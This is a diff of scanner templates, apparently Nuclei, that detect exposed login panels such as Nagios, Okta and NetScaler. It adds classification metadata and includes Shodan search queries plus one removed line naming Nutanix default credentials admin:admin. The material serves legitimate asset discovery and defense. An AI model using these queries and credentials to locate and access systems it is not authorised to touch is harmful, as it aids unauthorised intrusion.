a/exposed-panels/movable-type-login.yaml b/exposed-panels/movable-type-login.yaml index ae2f1fe95e..6b8275de50 100644 --- a/exposed-panels/movable-type-login.yaml +++ b/exposed-panels/movable-type-login.yaml @@ -1,9 +1,14 @@ id: movable-type-login info: - name: Movable Type Pro + name: Movable Type Pro Login Panel - Detect author: dhiyaneshDk severity: info + description: Movable Type Pro login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: title:"サインイン | Movable Type Pro" tags: panel,movable @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/ms-adcs-detect.yaml b/exposed-panels/ms-adcs-detect.yaml index 3bac89233d..1d2a18cee0 100644 --- a/exposed-panels/ms-adcs-detect.yaml +++ b/exposed-panels/ms-adcs-detect.yaml @@ -1,9 +1,14 @@ id: ms-adcs-detect info: - name: MS Active Directory Certificate Services Detector + name: Microsoft Active Directory Certificate Services Panel - Detect author: divya_mudgal severity: info + description: Microsoft Active Directory Certificate Services panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: microsoft,ad,panel requests: @@ -26,4 +31,6 @@ requests: extractors: - type: kval kval: - - location \ No newline at end of file + - location + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/mspcontrol-login.yaml b/exposed-panels/mspcontrol-login.yaml index 8b3dbab71f..ffeb348207 100644 --- a/exposed-panels/mspcontrol-login.yaml +++ b/exposed-panels/mspcontrol-login.yaml @@ -1,13 +1,17 @@ id: mspcontrol-login info: - name: MSPControl Login + name: MSPControl Login Panel - Detect author: idealphase severity: info - description: MSPControl is a Windows hosting control panel for Cloud Computing Companies and IT Providers to automate the provisioning of a full suite of hosted services on Windows servers. + description: MSPControl login panel was detected. reference: - https://mspcontrol.org/ - https://mspcontrol.org/downloads/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"MSPControl - Sign In" google-query: intitle:"MSPControl - Sign In" @@ -33,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/mybb-forum-detect.yaml b/exposed-panels/mybb-forum-detect.yaml index 805c1a1c46..0602ddbc2d 100644 --- a/exposed-panels/mybb-forum-detect.yaml +++ b/exposed-panels/mybb-forum-detect.yaml @@ -1,9 +1,14 @@ id: mybb-forum-detect info: - name: MyBB Forum Panel Detect + name: MyBB Login Panel - Detect author: ritikchaddha severity: info + description: MyBB login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"MyBB" @@ -23,3 +28,5 @@ requests: - 'MyBB Forum' - 'MyBB' condition: or + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/mybb/mybb-forum-install.yaml b/exposed-panels/mybb/mybb-forum-install.yaml index e463e9e50f..776485cdea 100644 --- a/exposed-panels/mybb/mybb-forum-install.yaml +++ b/exposed-panels/mybb/mybb-forum-install.yaml @@ -1,9 +1,14 @@ id: mybb-forum-install info: - name: MyBB Exposed Installation + name: MyBB Installation Panel - Detect author: ritikchaddha severity: high + description: MyBB installation panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"MyBB" @@ -32,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/nagios-panel.yaml b/exposed-panels/nagios-panel.yaml index 38861bee29..01087f8060 100644 --- a/exposed-panels/nagios-panel.yaml +++ b/exposed-panels/nagios-panel.yaml @@ -1,9 +1,14 @@ id: nagios-panel info: - name: Nagios Panel Detect + name: Nagios Login Panel - Detect author: ritikchaddha severity: info + description: Nagios login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"nagios" @@ -26,3 +31,5 @@ requests: - type: status status: - 401 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/nagios-xi-panel.yaml b/exposed-panels/nagios-xi-panel.yaml index c24fa70225..33a43d147b 100644 --- a/exposed-panels/nagios-xi-panel.yaml +++ b/exposed-panels/nagios-xi-panel.yaml @@ -1,9 +1,14 @@ id: nagios-xi-panel info: - name: Nagios XI Panel Detect + name: Nagios XI Login Panel - Detect author: ritikchaddha severity: info + description: Nagios XI login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Nagios XI" @@ -30,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/nagvis-panel.yaml b/exposed-panels/nagvis-panel.yaml index 0199be3522..d00f74c8f1 100644 --- a/exposed-panels/nagvis-panel.yaml +++ b/exposed-panels/nagvis-panel.yaml @@ -1,9 +1,14 @@ id: nagvis-panel info: - name: Nagvis Panel Detect + name: NagVis Login Panel - Detect author: ritikchaddha severity: info + description: NagVis login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"NagVis" @@ -30,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/nconf-panel.yaml b/exposed-panels/nconf-panel.yaml index 62c8527908..d98be1a4fc 100644 --- a/exposed-panels/nconf-panel.yaml +++ b/exposed-panels/nconf-panel.yaml @@ -1,9 +1,14 @@ id: nconf-panel info: - name: NConf Panel Detect + name: NConf Login Panel - Detect author: ritikchaddha severity: info + description: NConf login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"nconf" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/neobox-panel.yaml b/exposed-panels/neobox-panel.yaml index 340fb0ae56..a25905d393 100644 --- a/exposed-panels/neobox-panel.yaml +++ b/exposed-panels/neobox-panel.yaml @@ -1,9 +1,14 @@ id: neobox-panel info: - name: Neobox WebServer - Panel + name: Neobox Web Server Login Panel - Detect author: pikpikcu severity: info + description: Neobox Web Server login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"NeoboxUI" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/neos-panel.yaml b/exposed-panels/neos-panel.yaml index 8415282af2..af31ad2503 100644 --- a/exposed-panels/neos-panel.yaml +++ b/exposed-panels/neos-panel.yaml @@ -1,12 +1,16 @@ id: neos-panel info: - name: Neos CMS Login Panel + name: Neos CMS Login Panel - Detect author: k11h-de severity: info - description: detection of default route to admin login panel based on warranty disclainer in footer + description: Neos CMS login panel was detected. reference: - https://github.com/neos/neos/blob/master/Configuration/Routes.yaml + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,neos,cms,login requests: @@ -30,3 +34,5 @@ requests: - type: kval kval: - 'x_flow_powered' + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/nessus-panel.yaml b/exposed-panels/nessus-panel.yaml index 15ca1bd79b..6011a4e191 100644 --- a/exposed-panels/nessus-panel.yaml +++ b/exposed-panels/nessus-panel.yaml @@ -1,9 +1,14 @@ id: nessus-panel info: - name: Nessus Panel Detect + name: Tenable Nessus Panel - Detect author: joanbono,tess severity: info + description: Tenable Nessus panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Nessus" @@ -28,3 +33,5 @@ requests: - "<title>Nessus" - "window.location = '/unsupported6.html';" condition: and + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/netdata-dashboard-detected.yaml b/exposed-panels/netdata-dashboard-detected.yaml index 9ca6d2ee3f..cd69f74ee6 100644 --- a/exposed-panels/netdata-dashboard-detected.yaml +++ b/exposed-panels/netdata-dashboard-detected.yaml @@ -1,9 +1,14 @@ id: netdata-dashboard-detect info: - name: NetData Dashboard Detect + name: Netdata Dashboard Panel - Detect author: pussycat0x severity: info + description: Netdata Dashboard panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-dork: 'Server: NetData Embedded HTTP Server' tags: netdata,panel,tech @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/netdata-panel.yaml b/exposed-panels/netdata-panel.yaml index 2c09d19bd8..9801cdca93 100644 --- a/exposed-panels/netdata-panel.yaml +++ b/exposed-panels/netdata-panel.yaml @@ -1,15 +1,19 @@ id: netdata-panel info: - name: Netdata Panel + name: Netdata Panel - Detect author: TechbrunchFR severity: low description: | - Netdata is high-fidelity infrastructure monitoring and troubleshooting. Open-source, free, preconfigured, opinionated, and always real-time. - metadata: - shodan-query: http.title:"netdata dashboard" + Netdata panel was detected. reference: - https://github.com/netdata/netdata + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"netdata dashboard" tags: panel,netdata requests: @@ -31,4 +35,6 @@ requests: - type: word part: body words: - - "netdata" \ No newline at end of file + - "netdata" + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/netflix-conductor-ui.yaml b/exposed-panels/netflix-conductor-ui.yaml index 8e8c196a16..19063a4447 100644 --- a/exposed-panels/netflix-conductor-ui.yaml +++ b/exposed-panels/netflix-conductor-ui.yaml @@ -1,9 +1,14 @@ id: netflix-conductor-ui info: - name: Netflix Conductor UI Detection + name: Netflix Conductor UI Panel - Detect author: c-sh0 severity: info + description: Netflix Conductor UI panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Conductor UI", http.title:"Workflow UI" tags: webserver,netflix,conductor,panel @@ -26,4 +31,6 @@ requests: words: - 'Conductor UI' - 'Workflow UI' - condition: or \ No newline at end of file + condition: or + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/netgear-version-detect.yaml b/exposed-panels/netgear-version-detect.yaml index c19439c76d..fca3004944 100644 --- a/exposed-panels/netgear-version-detect.yaml +++ b/exposed-panels/netgear-version-detect.yaml @@ -1,9 +1,14 @@ id: netgear-version-detect info: - name: NETGEAR Router version detect + name: NETGEAR Router Panel - Detect author: dwisiswant0 severity: info + description: NETGEAR router panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,router,netgear requests: @@ -28,3 +33,5 @@ requests: regex: - "Model=([^\\s]+)" - "Firmware=([^\\s]+)" + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/netis-router.yaml b/exposed-panels/netis-router.yaml index 9a13896cd2..6147d0c327 100644 --- a/exposed-panels/netis-router.yaml +++ b/exposed-panels/netis-router.yaml @@ -1,11 +1,16 @@ id: netis-router info: - name: Netis Router Login + name: Netis Router Login Panel - Detect author: gy741 severity: info + description: Netis router login panel was detected. reference: - https://www.tacnetsol.com/blog/cve-2019-8985-rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,login,netis,router requests: @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/netlify-cms.yaml b/exposed-panels/netlify-cms.yaml index 0077c39b39..d28af7df77 100644 --- a/exposed-panels/netlify-cms.yaml +++ b/exposed-panels/netlify-cms.yaml @@ -1,9 +1,14 @@ id: netlify-cms info: - name: Netlify CMS Admin Panel + name: Netlify CMS Admin Login Panel - Detect author: sullo severity: info + description: Netlify CMS admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,netlify requests: @@ -20,3 +25,5 @@ requests: words: - "Netlify CMS" part: body + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/netscaler-aaa-login.yaml b/exposed-panels/netscaler-aaa-login.yaml index 00eed1e8c4..fbcaf48670 100644 --- a/exposed-panels/netscaler-aaa-login.yaml +++ b/exposed-panels/netscaler-aaa-login.yaml @@ -1,11 +1,16 @@ id: netscaler-aaa-login info: - name: NetScaler AAA Login Panel + name: NetScaler AAA Login Panel - Detect author: dhiyaneshDk severity: info + description: NetScaler AAA login panel was detected. reference: - https://www.exploit-db.com/ghdb/6898 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,netscaler,login,edb requests: @@ -17,3 +22,5 @@ requests: words: - "NetScaler AAA" condition: and + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/netsus-server-login.yaml b/exposed-panels/netsus-server-login.yaml index f6ed6c2754..6f09fad49f 100644 --- a/exposed-panels/netsus-server-login.yaml +++ b/exposed-panels/netsus-server-login.yaml @@ -1,9 +1,14 @@ id: netsus-server-login info: - name: NetSUS Server Login Panel + name: NetSUS Server Login Panel - Detect author: dhiyaneshDK severity: info + description: NetSUS Server login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"NetSUS Server Login" tags: panel,netsus,login @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/nginx-admin-panel.yaml b/exposed-panels/nginx-admin-panel.yaml index 934f88b4e5..36da25f950 100644 --- a/exposed-panels/nginx-admin-panel.yaml +++ b/exposed-panels/nginx-admin-panel.yaml @@ -1,11 +1,16 @@ id: nginx-admin-panel info: - name: Nginx Admin Manager Login Panel + name: Nginx Admin Manager Login Panel - Detect author: ritikchaddha severity: info + description: Nginx Admin Manager login panel was detected. reference: - https://ng-admin.jslsolucoes.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"nginx admin manager" @@ -28,3 +33,5 @@ requests: - 401 - 200 condition: or + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/nginx-proxy-manager.yaml b/exposed-panels/nginx-proxy-manager.yaml index f223e8fd50..ceb642de9c 100644 --- a/exposed-panels/nginx-proxy-manager.yaml +++ b/exposed-panels/nginx-proxy-manager.yaml @@ -1,9 +1,14 @@ id: nginx-proxy-manager info: - name: Nginx Proxy Manager + name: Nginx Proxy Manager Login Panel - Detect author: dhiyaneshDK severity: info + description: Nginx Proxy Manager login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Nginx Proxy Manager" tags: panel,nginx,proxy @@ -27,3 +32,5 @@ requests: group: 1 regex: - '"page" id="login" data\-version="([0-9.]+)">' + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/nginx-ui-dashboard.yaml b/exposed-panels/nginx-ui-dashboard.yaml index b94a7a9253..e54e174656 100644 --- a/exposed-panels/nginx-ui-dashboard.yaml +++ b/exposed-panels/nginx-ui-dashboard.yaml @@ -1,12 +1,16 @@ id: nginx-ui-dashboard info: - name: Nginx UI Dashboard Exposure + name: Nginx UI Panel - Detect author: gy741 severity: low - description: A Nginx UI login page was detected. + description: Nginx UI panel was detected. reference: - https://github.com/schenkd/nginx-ui + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"nginx ui" @@ -29,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/noescape-login.yaml b/exposed-panels/noescape-login.yaml index 256aaa5e7e..01da2a7598 100644 --- a/exposed-panels/noescape-login.yaml +++ b/exposed-panels/noescape-login.yaml @@ -1,9 +1,14 @@ id: noescape-login info: - name: NoEscape Login Panel + name: NoEscape Login Panel - Detect author: DhiyaneshDK severity: info + description: NoEscape login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-dork: title:"NoEscape - Login" @@ -20,3 +25,5 @@ requests: part: body words: - 'NoEscape - Login' + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/nordex-wind-farm-portal.yaml b/exposed-panels/nordex-wind-farm-portal.yaml index 86edee9db7..58db16e98f 100644 --- a/exposed-panels/nordex-wind-farm-portal.yaml +++ b/exposed-panels/nordex-wind-farm-portal.yaml @@ -1,12 +1,16 @@ id: nordex-wind-farm-portal info: - name: Nordex Control - Wind Farm Portal + name: Nordex Control Wind Farm Portal Login Panel - Detect author: geeknik severity: info - description: A Nordex Control Wind Farm Portal was detected. + description: Nordex Control Wind Farm Portal login panel was detected. reference: - https://www.nordex-online.com/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"Nordex Control" @@ -31,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/novnc-login-panel.yaml b/exposed-panels/novnc-login-panel.yaml index 0785fd6184..15350906ed 100644 --- a/exposed-panels/novnc-login-panel.yaml +++ b/exposed-panels/novnc-login-panel.yaml @@ -1,9 +1,14 @@ id: novnc-login-panel info: - name: novnc Login Panel + name: noVNC Login Panel - Detect author: tess severity: info + description: noVNC login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-dork: http.title:"noVNC" @@ -29,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/nozomi-panel.yaml b/exposed-panels/nozomi-panel.yaml index e66abb9152..3a3081114f 100644 --- a/exposed-panels/nozomi-panel.yaml +++ b/exposed-panels/nozomi-panel.yaml @@ -1,9 +1,14 @@ id: nozomi-panel info: - name: Nozomi Guardian Web Login Panel + name: Nozomi Guardian Login Panel - Detect author: robotshell severity: info + description: Nozomi Guardian login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Please Login | Nozomi Networks Console" @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/np-data-cache.yaml b/exposed-panels/np-data-cache.yaml index 017c7d6f5f..be3e172cdf 100644 --- a/exposed-panels/np-data-cache.yaml +++ b/exposed-panels/np-data-cache.yaml @@ -1,9 +1,14 @@ id: np-data-cache info: - name: NP Data Cache Panel + name: NP Data Cache Panel - Detect author: tess severity: unknown + description: NP Data Cache panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"NP Data Cache" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/nport-web-console.yaml b/exposed-panels/nport-web-console.yaml index 12e4837598..b853fe9621 100644 --- a/exposed-panels/nport-web-console.yaml +++ b/exposed-panels/nport-web-console.yaml @@ -1,11 +1,16 @@ id: nport-web-console info: - name: NPort Web Console + name: NPort Web Console Login Panel - Detect author: prajiteshsingh severity: info + description: NPort Web Console login panel was detected. reference: - https://www.moxa.com/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"NPort Web Console" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/nutanix-web-console-login.yaml b/exposed-panels/nutanix-web-console-login.yaml index 4346f4bcbf..d07ebd085d 100644 --- a/exposed-panels/nutanix-web-console-login.yaml +++ b/exposed-panels/nutanix-web-console-login.yaml @@ -1,10 +1,14 @@ id: nutanix-web-console-login info: - name: Nutanix web console login page + name: Nutanix Web Console Login Panel - Detect author: gy741 severity: info - description: Default Credentials of admin:admin on Nutanix web console. + description: Nutanix Web Console login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,nutanix,login requests: @@ -20,3 +24,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/nuxeo-platform-panel.yaml b/exposed-panels/nuxeo-platform-panel.yaml index e46de200c5..6a45a40ad2 100644 --- a/exposed-panels/nuxeo-platform-panel.yaml +++ b/exposed-panels/nuxeo-platform-panel.yaml @@ -1,27 +1,33 @@ -id: nuxeo-platform-panel - -info: - name: Nuxeo Platform Login Panel - author: kishore-hariram - severity: info - metadata: - verified: true - shodan-query: title:"Nuxeo Platform" - tags: panel,nuxeo - -requests: - - method: GET - path: - - "{{BaseURL}}/nuxeo/login.jsp" - - matchers-condition: and - matchers: - - type: word - words: - - 'Nuxeo Platform' - - 'alt="Nuxeo"' - condition: or - - - type: status - status: - - 200 +id: nuxeo-platform-panel + +info: + name: Nuxeo Platform Login Panel - Detect + author: kishore-hariram + severity: info + description: Nuxeo Platform login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + verified: true + shodan-query: title:"Nuxeo Platform" + tags: panel,nuxeo +requests: + - method: GET + path: + - "{{BaseURL}}/nuxeo/login.jsp" + + matchers-condition: and + matchers: + - type: word + words: + - 'Nuxeo Platform' + - 'alt="Nuxeo"' + condition: or + + - type: status + status: + - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/nzbget-panel.yaml b/exposed-panels/nzbget-panel.yaml index d9cc78a6e4..e74f544865 100644 --- a/exposed-panels/nzbget-panel.yaml +++ b/exposed-panels/nzbget-panel.yaml @@ -1,9 +1,14 @@ id: nzbget-panel info: - name: NZBGet Login Panel + name: NZBGet Login Panel - Detect author: DhiyaneshDK severity: info + description: NZBGet login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: html:"NZBGet" @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/ocs-inventory-login.yaml b/exposed-panels/ocs-inventory-login.yaml index fcc794e222..1cb84db673 100644 --- a/exposed-panels/ocs-inventory-login.yaml +++ b/exposed-panels/ocs-inventory-login.yaml @@ -1,9 +1,14 @@ id: ocs-inventory-login info: - name: OCS Inventory Login Panel + name: OCS Inventory Login Panel - Detect author: pikpikcu,ritikchaddha severity: info + description: OCS Inventory login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"OCS Inventory" @@ -29,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/octoprint-login.yaml b/exposed-panels/octoprint-login.yaml index c315a55380..cea13cad82 100644 --- a/exposed-panels/octoprint-login.yaml +++ b/exposed-panels/octoprint-login.yaml @@ -1,9 +1,14 @@ id: octoprint-panel info: - name: OctoPrint Login + name: OctoPrint Login Panel - Detect author: affix severity: info + description: OctoPrint login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: octoprint,panel requests: @@ -20,4 +25,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/officekeeper-admin-login.yaml b/exposed-panels/officekeeper-admin-login.yaml index 01afb6105c..514e36b0b0 100644 --- a/exposed-panels/officekeeper-admin-login.yaml +++ b/exposed-panels/officekeeper-admin-login.yaml @@ -1,9 +1,14 @@ id: officekeeper-admin-login info: - name: OfficeKeeper - Admin Login Panel + name: OfficeKeeper Admin Login Panel - Detect author: gy741 severity: info + description: OfficeKeeper admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:-800060828 @@ -21,3 +26,5 @@ requests: part: body words: - "통합PC보안이 가능한 정보유출방지 솔루션" + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/oki-data.yaml b/exposed-panels/oki-data.yaml index 9e5b07e052..9059fd669d 100644 --- a/exposed-panels/oki-data.yaml +++ b/exposed-panels/oki-data.yaml @@ -1,11 +1,16 @@ id: oki-data-corporation info: - name: Oki Data Corporation + name: OKI Data Panel - Detect author: dhiyaneshDK severity: info + description: OKI Data panel was detected. reference: - https://www.exploit-db.com/ghdb/5937 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,oki,edb requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/okiko-sfiler-portal.yaml b/exposed-panels/okiko-sfiler-portal.yaml index b74089478f..61af5fdc33 100644 --- a/exposed-panels/okiko-sfiler-portal.yaml +++ b/exposed-panels/okiko-sfiler-portal.yaml @@ -1,9 +1,14 @@ id: okiko-sfiler-portal info: - name: OKIKO S-Filer Portal Detect + name: OKIOK S-Filer Portal Login Panel - Detect author: johnk3r severity: info + description: OKIOK S-Filer Portal login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"S-Filer" tags: okiko,panel @@ -30,3 +35,5 @@ requests: group: 1 regex: - 'S\-Filer\/([A-Za-z 0-9.]+)<\/p>' + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/okta-panel.yaml b/exposed-panels/okta-panel.yaml index 277010ae33..fb5d015397 100644 --- a/exposed-panels/okta-panel.yaml +++ b/exposed-panels/okta-panel.yaml @@ -1,9 +1,14 @@ id: okta-panel info: - name: Okta Login Panel + name: Okta Login Panel - Detect author: pussycat0x severity: info + description: Okta login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"okta" tags: panel,okta,login @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/olt-web-interface.yaml b/exposed-panels/olt-web-interface.yaml index 00d15874d4..ec43c47263 100644 --- a/exposed-panels/olt-web-interface.yaml +++ b/exposed-panels/olt-web-interface.yaml @@ -1,11 +1,16 @@ id: olt-web-interface info: - name: OLT Web Management Interface + name: OLT Web Management Interface Login Panel - Detect author: DhiyaneshDk severity: info + description: OLT Web Management Interface login panel was detected. reference: - https://www.exploit-db.com/ghdb/8020 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"OLT Web Management Interface" @@ -30,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 